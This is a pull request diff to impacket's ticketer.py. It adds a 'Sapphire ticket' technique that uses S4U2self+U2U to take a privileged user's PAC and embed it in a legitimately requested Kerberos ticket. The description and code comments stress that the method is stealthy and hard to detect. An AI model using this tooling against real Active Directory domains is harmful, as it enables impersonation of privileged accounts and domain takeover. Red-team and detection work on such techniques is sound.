### PR TITLE
[ticketer.py] Sapphire tickets

### DIFF
--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -66,7 +66,7 @@ from impacket.dcerpc.v5.ndr import NDRULONG
 from impacket.dcerpc.v5.samr import NULL, GROUP_MEMBERSHIP, SE_GROUP_MANDATORY, SE_GROUP_ENABLED_BY_DEFAULT, \
     SE_GROUP_ENABLED, USER_NORMAL_ACCOUNT, USER_DONT_EXPIRE_PASSWORD
 from impacket.examples import logger
-from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart
+from impacket.krb5.asn1 import AS_REP, TGS_REP, ETYPE_INFO2, AuthorizationData, EncTicketPart, EncASRepPart, EncTGSRepPart, AD_IF_RELEVANT
 from impacket.krb5.constants import ApplicationTagNumbers, PreAuthenticationDataTypes, EncryptionTypes, \
     PrincipalNameType, ProtocolVersionNumber, TicketFlags, encodeFlags, ChecksumTypes, AuthorizationDataType, \
     KERB_NON_KERB_CKSUM_SALT

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -521,6 +521,8 @@ class TICKETER:
         ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(hours=int(self.__options.duration))
 
         if self.__options.impersonate:
+            # Doing Sapphire Ticket
+            # todo : in its actual form, ticketer is limited to the PAC structures that are supported in impacket. Unsupported structures will be ignored. The PAC is not completely copy-pasted here.
 
             # 1. S4U2Self + U2U
             logging.info('\tRequesting S4U2self+U2U to obtain %s\'s PAC' % self.__options.impersonate)
@@ -535,11 +537,12 @@ class TICKETER:
             encTicketPart = decoder.decode(plainText, asn1Spec=EncTicketPart())[0]
 
             # Let's extend the ticket's validity a lil bit
-            encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
-            encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
-            adIfRelevant = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[0]
+            # I don't think this part should be left in the code. The whole point of doing a sapphire ticket is stealth, extending ticket duration is not the way to go
+            # encTicketPart['endtime'] = KerberosTime.to_asn1(ticketDuration)
+            # encTicketPart['renew-till'] = KerberosTime.to_asn1(ticketDuration)
 
             # Opening PAC
+            adIfRelevant = decoder.decode(encTicketPart['authorization-data'][0]['ad-data'], asn1Spec=AD_IF_RELEVANT())[0]
             pacType = pac.PACTYPE(adIfRelevant[0]['ad-data'].asOctets())
             pacInfos = dict()
             buff = pacType['Buffers']
@@ -973,7 +976,7 @@ if __name__ == '__main__':
     group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
     group.add_argument('-dc-ip', action='store',metavar = "ip address",  help='IP Address of the domain controller. If '
                        'ommited it use the domain part (FQDN) specified in the target parameter')
-    parser.add_argument('-impersonate', action="store", help='target username that will be impersonated (thru S4U2Self+U2U)'
+    parser.add_argument('-impersonate', action="store", help='Sapphire ticket. target username that will be impersonated (through S4U2Self+U2U)'
                                                              ' for querying the ST and extracting the PAC, which will be'
                                                              ' included in the new ticket')
 

--- a/examples/ticketer.py
+++ b/examples/ticketer.py
@@ -337,6 +337,7 @@ class TICKETER:
             tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
                                                                     unhexlify(lmhash), unhexlify(nthash), None,
                                                                     self.__options.dc_ip)
+            self.__tgt, self.__tgt_cipher, self.__tgt_session_key = tgt, cipher, sessionKey
             if self.__domain == self.__server:
                 kdcRep = decoder.decode(tgt, asn1Spec=AS_REP())[0]
             else:
@@ -387,7 +388,7 @@ class TICKETER:
                 return None, None
             kdcRep['cname']['name-type'] = PrincipalNameType.NT_PRINCIPAL.value
             kdcRep['cname']['name-string'] = noValue
-            kdcRep['cname']['name-string'][0] = self.__target
+            kdcRep['cname']['name-string'][0] = self.__options.impersonate or self.__target
 
         else:
             logging.info('Creating basic skeleton ticket and PAC Infos')
@@ -654,8 +655,7 @@ class TICKETER:
                 self.createAttributesInfoPac(pacInfos)
             if self.__options.old_pac is False and not RequestorInfoPacInS4UU2UPAC:
                 if self.__options.user_id == "500":
-                    logging.warning(
-                        "User ID is 500, which is Impacket's default. If you specified -user-id, you can ignore this message. "
+                    logging.warning("User ID is 500, which is Impacket's default. If you specified -user-id, you can ignore this message. "
                         "If you didn't, and you get a KDC_ERR_TGT_REVOKED error when using the ticket, you will need to specify the -user-id "
                         "with the RID of the target user to impersonate")
                 self.createRequestorInfoPac(pacInfos)


### PR DESCRIPTION
> Sapphire tickets are similar to [Diamond tickets](https://github.com/o/-MHRexVI3zSPLt5XfmzC/s/-MHRw3PMJtbDDjbxm5ub/~/changes/SxwNfefYjK5UqnqWZ2Cv/ad/movement/kerberos/forged-tickets/diamond) in the way the ticket is not forged, but instead based on a legitimate one obtained after a request. The difference lays in how the PAC is modified. The [Diamond ticket](https://github.com/o/-MHRexVI3zSPLt5XfmzC/s/-MHRw3PMJtbDDjbxm5ub/~/changes/SxwNfefYjK5UqnqWZ2Cv/ad/movement/kerberos/forged-tickets/diamond) approach modifies the legitimate PAC to add some privileged groups (or replace it with a fully-forged one). In the Sapphire ticket approach, the PAC of another powerful user is obtained through an [S4U2self+u2u](https://github.com/o/-MHRexVI3zSPLt5XfmzC/s/-MHRw3PMJtbDDjbxm5ub/~/changes/SxwNfefYjK5UqnqWZ2Cv/ad/movement/kerberos#s4u2self-+-u2u) trick. This PAC then replaces the one featured in the legitimate ticket. The resulting ticket is an assembly of legitimate elements, and follows a standard ticket request, which makes it then most difficult silver/golden ticket variant to detect. ([thehacker.recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire))

Adding an `-impersonate` flag and S4U2self+u2u capabilities to operate what I call "the sapphire ticket" technique